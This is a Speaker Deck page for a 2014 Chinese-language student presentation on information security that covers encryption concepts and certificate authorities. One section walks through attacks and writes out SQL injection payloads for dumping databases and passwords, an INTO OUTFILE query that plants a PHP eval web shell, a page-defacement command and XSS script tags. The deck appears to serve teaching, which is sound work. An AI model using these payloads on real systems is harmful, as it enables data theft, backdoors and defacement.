Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Information Security
Search
Bleu Ren
February 24, 2014
Technology
0
57
Information Security
AIS presentation
[email protected]
Bleu Ren
February 24, 2014
Tweet
Share
More Decks by Bleu Ren
See All by Bleu Ren
Introduction to Convolutional Neural Networks
bleu
0
94
Recently doing-20161110
bleu
0
51
Industry 5.0
bleu
0
250
Big Data
bleu
0
76
Database Management Concepts
bleu
0
77
Bleu Framework for Hbase & Hadoop
bleu
0
88
Paper discuss : Hadoop & HBase
bleu
1
70
Visualizing social network concepts
bleu
0
90
Determinants of RFID adoption intention: Evidence from Taiwanese retail chains
bleu
0
75
Other Decks in Technology
See All in Technology
「AI駆動開発」のボトルネック『言語化』を効率化するには
taniiicom
1
230
ビジネス文書に特化した基盤モデル開発 / SaaSxML_Session_2
sansan_randd
0
190
Kiroから考える AIコーディングツールの潮流
s4yuba
2
560
「育てる」サーバーレス 〜チーム開発研修で学んだ、小さく始めて大きく拡張するAWS設計〜
yu_kod
1
210
生成AI時代におけるAI・機械学習技術を用いたプロダクト開発の深化と進化 #BetAIDay
layerx
PRO
0
320
完璧を目指さない小さく始める信頼性向上
kakehashi
PRO
0
130
みんなのSRE 〜チーム全員でのSRE活動にするための4つの取り組み〜
kakehashi
PRO
2
110
LLMをツールからプラットフォームへ〜Ai Workforceの戦略〜 #BetAIDay
layerx
PRO
0
260
GMOペパボのデータ基盤とデータ活用の現在地 / Current State of GMO Pepabo's Data Infrastructure and Data Utilization
zaimy
2
130
AI人生苦節10年で会得したAIがやること_人間がやること.pdf
shibuiwilliam
1
230
恐怖!テストコードなき夜
tsukuboshi
2
110
【CEDEC2025】『ウマ娘 プリティーダービー』における映像制作のさらなる高品質化へ!~ 豊富な素材出力と制作フローの改善を実現するツールについて~
cygames
PRO
0
100
Featured
See All Featured
GitHub's CSS Performance
jonrohan
1031
460k
Scaling GitHub
holman
461
140k
Music & Morning Musume
bryan
46
6.7k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
29
2.8k
Gamification - CAS2011
davidbonilla
81
5.4k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
34
3.1k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
29
9.6k
The World Runs on Bad Software
bkeepers
PRO
70
11k
Building a Modern Day E-commerce SEO Strategy
aleyda
42
7.4k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
35
2.5k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
44
2.4k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
30
2.2k
Transcript
會計資訊系統簡報 - 資訊安全 簡報製作 : 四資管四甲 任家輝 指導教授 : 杜佩樺
隱密性 如何確保只有寄件者及收件者可以 讀取資料
可認證性 如何知道資料是來自原寄件者
完整性 如何知道資料沒有被更改過
不可抵賴性 防止資料傳輸/接收發生後對行為 的否認。
秘密金鑰加密法(對稱性加密)
公開金鑰加密法(非對稱性加密) • 收件者保留私密金鑰,並將公開金鑰公諸 於世,送件者依照公開金鑰將訊息加密, 收件者在使用私密金鑰進行解密
公開金鑰加密法(非對稱性加密)
可逆加密與不可逆加密
安全認證中心CA
延伸內容 – 從駭客面談資安 了解駭客思維,才能應付千方百計 的駭客
CSRF
None
SQLi
None
查詢注入欄位 • 注入時,可能會先使用 UNION 找出可以插 入的地方爲何,例如: • http://localhost/news/?mod=news&act =show&id=-1 union
select 1,2,3,4,5,6,7
• 可以看出 3, 4, 7 的地方可以插入我們想要獲取的資 料, 假如我們想要知道當前使用者為何,可以將 7 的地
方改成 user() 如: • http://localhost/news/?mod=news&act=show& id=-1 union select 1,2,3,4,5,6,user()
None
• 若是要取得某欄位的資訊的話(以使 用者密碼為例),則是注入-1 union select 1,2,3,4,5,6,password from user limit 0,1
• 使用(SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE
@ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name,column_name) )) ) )x)將整個資料庫dump出來
寫後門改首頁 • ?MOD=NEWS&ACT=SHOW&ID=1 INTO OUTFILE '../../../../apache24/htdoc s/.a.php' LINES TERMINATED BY
'<?php eval($_GET[cmd];)?>' • 透過outfile的方式建立後門檔案到網站目 錄中
再透過fwrite的方式更改首頁。 • /.a.php?cmd=$fp = fopen('index.php', 'w');fwrite($fp, "Hack by 49941131");fclose($fp);
None
或是直接以最高權限執行 server command
XSS
使用訊息框進行XSS attack • <script>alert(‘hello’)</script>
利用XSS改首頁 <script>window.onload = function(){document.write('hacked by 49941131')}</script>
謝謝